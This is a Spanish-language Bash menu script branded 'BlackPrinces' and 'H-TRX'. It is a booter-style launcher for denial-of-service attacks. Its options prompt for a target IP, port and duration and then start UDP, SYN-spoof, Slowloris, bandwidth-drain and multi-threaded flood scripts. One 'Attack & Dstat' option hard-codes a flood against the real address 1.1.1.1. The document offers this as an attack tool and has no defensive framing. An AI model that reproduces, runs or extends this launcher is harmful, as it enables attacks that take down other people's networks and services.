#!/bin/bash
BLACK='\e[0;30m'
BLUE='\e[0;34m'
GREEN='\e[0;32m'
CYAN='\e[0;36m'
RED='\e[0;31m'
PURPLE='\e[0;35m'
BROWN='\e[0;33m'
LIGHTGRAY='\e[0;37m'
DARKGRAY='\e[1;30m'
LIGHTBLUE='\e[1;34m'
LIGHTGREEN='\e[1;32m'
LIGHTCYAN='\e[1;36m'
LIGHTRED='\e[1;31m'
LIGHTPURPLE='\e[1;35m'
YELLOW='\e[1;33m'
WHITE='\e[1;37m'
NC='\e[0m'              # No Color
# Trap Signal Script
#
#TitaniumScript.bypass//BASH  Bypass.Function
#load
exit_script()
{
  echo "* * *Trap * * *"
  ./menu
}

dstat1()
{
    clear
    echo -e " ${LIGHTRED} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                          ADMIN DSTAT                              ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
dstat
    
}

admin12()
{
    clear
    echo -e " ${LIGHTRED} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                          ADMIN PANEL                              ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
echo "Estoy seguro de que puedes crear tu propio panel :3"
echo "Si realmente no sabes como puedes contactarme por YT"
echo "Mi canal es N4H INK"
read ok
clear
    
}

udp_flooda()
{
    clear
    echo -e " ${LIGHTRED} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                        PRIVATE VERSION 1.0 !                      ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ŠŠŠ${LIGHTCYAN}                              H-TRX${LIGHTCYAN}                                ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                               SCRIPT${LIGHTCYAN}                              ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                                 POR${LIGHTRED}                               ŠŠŠ "
    echo -e "  ŠŠŠ${LIGHTCYAN}                            N4H1NCK${LIGHTRED}                                ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                           Version 1.0                             ŠŠŠ "
    echo "  ŠŠŠ+-----------------------------------------------------------------+ŠŠŠ " 
    echo "  ŠŠŠ                              UDP H-TRX                            ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Introduzca la ip:"
read ip
echo "Introduzca el puerto:"
read port
echo "Introduzca el tiempo:"
read time
./gott.1.pl $ip $port 0 $time
}

udp_floodb()
{
    clear
    echo -e " ${LIGHTRED} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                        PRIVATE VERSION 1.0 !                      ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ŠŠŠ${LIGHTCYAN}                              H-TRX${LIGHTCYAN}                                ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                               SCRIPT${LIGHTCYAN}                              ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                                 POR${LIGHTRED}                               ŠŠŠ "
    echo -e "  ŠŠŠ${LIGHTCYAN}                            N4H1NCK${LIGHTRED}                                ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                           Version 1.0                             ŠŠŠ "
    echo "  ŠŠŠ+-----------------------------------------------------------------+ŠŠŠ " 
    echo "  ŠŠŠ                                  UDP                              ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Introduzca la ip :"
read ip
echo "Introduzca el puerto :"
read port
echo "Introduzca el tiempo :"
read time
python gott.2.py $ip $port $time
}

slap()
{
    clear
    echo -e " ${LIGHTRED} "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                        PRIVATE VERSION 1.0 !                      ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ŠŠŠ${LIGHTCYAN}                              H-TRX${LIGHTCYAN}                                ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                               SCRIPT${LIGHTCYAN}                              ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                                 POR${LIGHTRED}                               ŠŠŠ "
    echo -e "  ŠŠŠ${LIGHTCYAN}                            N4H1NCK${LIGHTRED}                                ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                           Version 1.0                             ŠŠŠ "
    echo "  ŠŠŠ+-----------------------------------------------------------------+ŠŠŠ " 
    echo "  ŠŠŠ                            GoTT H-TRX                             ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Introduzca la ip :"
read ip
perl gott.3.pl $ip
}

slowloris()
{
    clear
    echo -e " ${LIGHTRED} "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                        PRIVATE VERSION 1.0 !                      ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ŠŠŠ${LIGHTCYAN}                              H-TRX${LIGHTCYAN}                                ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                               SCRIPT${LIGHTCYAN}                              ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                                 POR${LIGHTRED}                               ŠŠŠ "
    echo -e "  ŠŠŠ${LIGHTCYAN}                            N4H1NCK${LIGHTRED}                                ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                           Version 1.0                             ŠŠŠ "
    echo "  ŠŠŠ+-----------------------------------------------------------------+ŠŠŠ " 
    echo "  ŠŠŠ                        Slowloris H-TRX                            ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Para detener este script despues de la ejecucion, mantenga [CTRL] + [C]"
echo "Introduzca el sitio web:"
read host
echo "Introduzca el puerto :"
read port
./slowloris $host $port
}

killall()
{
    clear
    echo -e " ${LIGHTRED} "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                        PRIVATE VERSION 1.0 !                      ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ŠŠŠ${LIGHTCYAN}                              H-TRX${LIGHTCYAN}                                ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                               SCRIPT${LIGHTCYAN}                              ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                                 POR${LIGHTRED}                                ŠŠŠ "
    echo -e "  ŠŠŠ${LIGHTCYAN}                            N4H1NCK${LIGHTRED}                                 ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                           Version 1.0                             ŠŠŠ "
    echo "  ŠŠŠ+-----------------------------------------------------------------+ŠŠŠ " 
pkill gott.1.pl
pkill gott.2.py
pkill gott.2.pl
pkill gott.4.pl
pkill slowloris
}

fry()
{
    clear
    echo -e " ${LIGHTRED} "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                        PRIVATE VERSION 1.0 !                      ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ŠŠŠ${LIGHTCYAN}                              H-TRX${LIGHTCYAN}                                ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                               SCRIPT${LIGHTCYAN}                              ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                                 POR${LIGHTRED}                               ŠŠŠ "
    echo -e "  ŠŠŠ${LIGHTCYAN}                            N4H1NCK${LIGHTRED}                                ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                           Version 1.0                             ŠŠŠ "
    echo "  ŠŠŠ+-----------------------------------------------------------------+ŠŠŠ " 
    echo "  ŠŠŠ             SUPER Nytro PARAR CON CTRL+C                          ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Indroduzca la ip :"
read ip
echo "Indroduzca el puerto :"
read port
echo "Indroduzca el numero de paquetes:"
read size
echo "Indroduzca el tiempo:"
read time
perl nytro.pl $ip $port $size $time

}

and()
{
    clear
    echo -e " ${LIGHTRED} "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                        PRIVATE VERSION 1.0 !                      ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ŠŠŠ${LIGHTCYAN}                              H-TRX${LIGHTCYAN}                                ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                               SCRIPT${LIGHTCYAN}                              ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                                 POR${LIGHTRED}                               ŠŠŠ "
    echo -e "  ŠŠŠ${LIGHTCYAN}                               N4H1NCK${LIGHTRED}                             ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                           Version 2.0                             ŠŠŠ "
    echo "  ŠŠŠ+-----------------------------------------------------------------+ŠŠŠ " 
    echo "  ŠŠŠ                     Attack And Dstat Cant be stop                 ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Nota: esta secuencia de comandos le mostrara su poder"
echo "La prueba es de solo 20 segundos despues de detener Dstat con CTRL + C"
echo "Presione enter :)"
read enter
perl nytro.pl 1.1.1.1 80 65500 20 & dstat

}

autoinstall()
{

clear
./install
}

bw()
{
    clear
    echo -e " ${LIGHTRED} "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                        PRIVATE VERSION 1.0 !                      ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ŠŠŠ${LIGHTCYAN}                              H-TRX${LIGHTCYAN}                                ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                               SCRIPT${LIGHTCYAN}                              ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                                 POR${LIGHTRED}                               ŠŠŠ "
    echo -e "  ŠŠŠ${LIGHTCYAN}                            N4H1NCK${LIGHTRED}                                ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                           Version 1.0                             ŠŠŠ "
    echo "  ŠŠŠ+-----------------------------------------------------------------+ŠŠŠ " 
    echo "  ŠŠŠ                    Bandwidth Drain H-TRX                          ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Introduzca la ip :"
read ip
echo "Introduzca el puerto :"
read port
echo "Introduzca el tiempo :"
read time
./gott -i $ip -p $port -s 32000 -t $time
}

multi()
{
    clear
    echo -e " $LIGHTCYAN} "
    echo "               H-TRX MULTI FLOOD UPDATED "   
    echo "Script"
    echo ""	
    echo -e "        '||    ||'          '||    .    || " 
    echo -e "         |||  |||  ... ...   ||  .||.  ...  "
    echo -e "         |'|..'||   ||  ||   ||   ||    ||  "
    echo -e "         | '|' ||   ||  ||   ||   ||    ||  "
    echo -e "        .|. | .||.  '|..'|. .||.  '|.' .||. "
    echo ""
    echo "    El que se atreva a jugar a dios debe pagar un alto precio."
    echo ""
echo "Introduzca la ip :"
read ip
echo "Introduzca el puerto :"
read port
echo "Introduzca el numero de paquetes: 65500"
read size
echo "Introduzca el tiempo :"
read time
echo "Ingrese el numero de hilos :"
read threads
echo "Le gustaria ver la salida ADVERTENCIA si si la inundacion puede disminuir 0 = No 1 = Si"
read output
perl multi.pl $ip $port $size $time $threads $output
}

syn()
{
    clear
    echo -e " ${LIGHTRED} "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                        PRIVATE VERSION 1.0 !                      ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ŠŠŠ${LIGHTCYAN}                              H-TRX${LIGHTCYAN}                                ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                               SCRIPT${LIGHTCYAN}                              ŠŠŠ " 
    echo -e "  ŠŠŠ${LIGHTCYAN}                                 POR${LIGHTRED}                               ŠŠŠ "
    echo -e "  ŠŠŠ${LIGHTCYAN}                            N4H1NCK${LIGHTRED}                                ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ŠŠŠ                           Version 1.0                             ŠŠŠ "
    echo "  ŠŠŠ+-----------------------------------------------------------------+ŠŠŠ " 
    echo "  ŠŠŠ                    Spoofed SyN Flood coded in C                   ŠŠŠ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Introduzca la ip :"
read ip
echo "Introduzca el puerto :"
read port
./syn $ip $port
}

exit_script1()
{
  exit 1
}

Take_input1()
{
clear
while :
do
clear
echo -e "${WHITE}Princes${RED}                                         User:"${LIGHTCYAN}$(whoami)"${RED}Expires:"${LIGHTPURPLE}Lifetime
echo -e "${WHITE}                                                     MENU PRIVADO 6.0 
Bypass [${LIGHTPURPLE}ON${WHITE}]                                "${LIGHTCYAN}Tu Version: "${LIGHTCYAN}v6.0 "${LIGHTCYAN}[Version Privada]
echo -e "${WHITE}
   _ B _ L _ A _ C _ K _                     Projectツ◀♛BlackPrinces♛▶ツ﻿ Private 1.0 ${WHITE}
  / \ / \ / \ / \ / \ / \                       --------------------------------${LIGHTCYAN}
 ( P | R | I | N | C | E )      ${LIGHTCYAN}                 ESTAS CONECTADO A BlackPrinces ${WHITE}
  \_/ \_/ \_/ \_/ \_/ \_/                      ----------------------------------
"${WHITE}
    echo -e "${WHITE}Nota: "${LIGHTCYAN}PARA SALIR DE UN ESCRITURA O DETENER ATAQUES, PULSE [CTRL + C] MATAR TODOS LOS ATAQUES CON 14
    echo -e "${LIGHTRED}[==============================================================================]"
    echo -e "${LIGHTCYAN}[1]${LIGHTRED}UDP Flood${LIGHTCYAN}                                             [5]${LIGHTRED}Bandwidth${LIGHTBLUE}"                                                                                         																									
    echo -e "${LIGHTCYAN}[2]${LIGHTRED}UDP Flood B${LIGHTCYAN}                                           [6]${LIGHTRED}SyN Flood${LIGHTCYAN}"
    echo -e "${LIGHTCYAN}[3]${LIGHTRED}Xtreme FlooD${LIGHTCYAN}                                          [7]${LIGHTCYAN}MULTI UPDATED${LIGHTCYAN}"
    echo -e "${LIGHTCYAN}[4]${LIGHTRED}SLOWLORIS${LIGHTCYAN}                                             [8]${LIGHTRED}PRINCE SCRIPT${LIGHTCYAN}"
    echo -e ""                                                                 
    echo -e "${LIGHTRED}[==============================================================================]"
    echo -e "${PURPLE}                                 ~OPTIONS~                                      "
    echo -e "${LIGHTCYAN}[9]${LIGHTRED}Change Password${LIGHTCYAN}                                       [AI]${LIGHTRED}Installer"
    echo -e "${LIGHTCYAN}[10]${LIGHTRED}Dstat${LIGHTCYAN}                                                [12]${LIGHTRED}Admin Panel"
    echo -e "${LIGHTCYAN}[11]${LIGHTRED}Attack & Dstat${LIGHTCYAN}                                       [13]${LIGHTRED}Exit Menu"
    echo -e ""
    echo -n "#BlackPrinces - Menu [1-13-AI]: "
    read yourch
    case $yourch in
      1) udp_flooda ;;
      2) udp_floodb ;;
      3) slap ;;
	  4) slowloris ;;
	  8) fry ;;
         5) bw ;;
         6) syn ;;
	  14) killall ;;
	  9) passwd ;;
	  7) multi ;;
	  10) dstat1 ;;
	  11) and ;;
	  12) admin12 ;;
	  AI) autoinstall ;;
      ex) echo "Como usted ordene" ;  exit 1  ;;
	  13) pkill menu  ;;
      *) echo "Seleccion invalida, por favor coge otro numero [1-11]" ;
         echo "Presiona Enter. . ." ; read ;;
 esac
done # end_while
}
#
# Set trap to for CTRL+C interrupt i.e. Install our error handler
# When occurs it first it calls del_file() and then exit
#
trap exit_script 2
#
# Call our user define function : Take_input1
#
Take_input1
